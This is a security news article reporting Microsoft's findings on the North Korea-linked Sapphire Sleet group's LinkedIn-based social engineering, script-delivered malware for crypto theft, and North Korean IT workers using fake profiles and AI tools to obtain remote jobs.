The North Korea-linked threat actor known as Sapphire Sleet is estimated to have stolen more than $10 million worth of cryptocurrency as part of social engineering campaigns orchestrated over a six-month period.
These findings come from Microsoft, which said that multiple threat activity clusters with ties to the country have been observed creating fake profiles on LinkedIn, posing as both recruiters and job seekers to generate illicit revenue for the sanction-hit nation.
Sapphire Sleet, which is known to be active since at least 2020, overlaps with hacking groups tracked as APT38 and BlueNoroff. In November 2023, the tech giant revealed that the threat actor had established infrastructure that impersonated skills assessment portals to carry out its social engineering campaigns.
One of the main methods adopted by the group for over a year is to pose as a venture capitalist, deceptively claiming an interest in a target user’s company in order to set up an online meeting. Targets who fall for the bait and attempt to connect to the meeting are shown error messages that urge them to contact the room administrator or support team for assistance.
Should the victim reach out to the threat actor, they are either sent an AppleScript (.scpt) file or a Visual Basic Script (.vbs) file depending on the operating system used to resolve the supposed connection issue.
Under the hood, the script is used to download malware onto the compromised Mac or Windows machine, ultimately allowing the attackers to obtain credentials and cryptocurrency wallets for subsequent theft.
Sapphire Sleet has been identified masquerading as a recruiters for financial firms like Goldman Sachs on LinkedIn to reach out to prospective targets and ask them to complete a skills assessment hosted on a website under their control.
“The threat actor sends the target user a sign-in account and password,” Microsoft said. “In signing in to the website and downloading the code associated with the skills assessment, the target user downloads malware onto their device, allowing the attackers to gain access to the system.”
Redmond has also characterized North Korea’s dispatching of thousands of IT workers abroad as a triple threat that makes money for the regime through “legitimate” work, allows them to abuse their access to get hold of intellectual property, and facilitates data theft in exchange for a ransom.
“Since it’s difficult for a person in North Korea to sign up for things such as a bank account or phone number, the IT workers must utilize facilitators to help them acquire access to platforms where they can apply for remote jobs,” it said. “These facilitators are used by the IT workers for tasks such as creating an account on a freelance job website.”
This includes creating bogus profiles and portfolios on developer platforms like GitHub and LinkedIn to communicate with recruiters and apply for jobs.
In some instances, they have also been found using artificial intelligence (AI) tools like Faceswap to modify photos and documents stolen from victims or show them against the backdrop of professional-looking settings. These pictures are then utilized on resumes or profiles, sometimes for several personas, that are submitted for job applications.
“In addition to using AI to assist with creating images used with job applications, North Korean IT workers are experimenting with other AI technologies such as voice-changing software,” Microsoft said.
“The North Korean IT workers appear to be very organized when it comes to tracking payments received. Overall, this group of North Korean IT workers appears to have made at least 370,000 US dollars through their efforts.”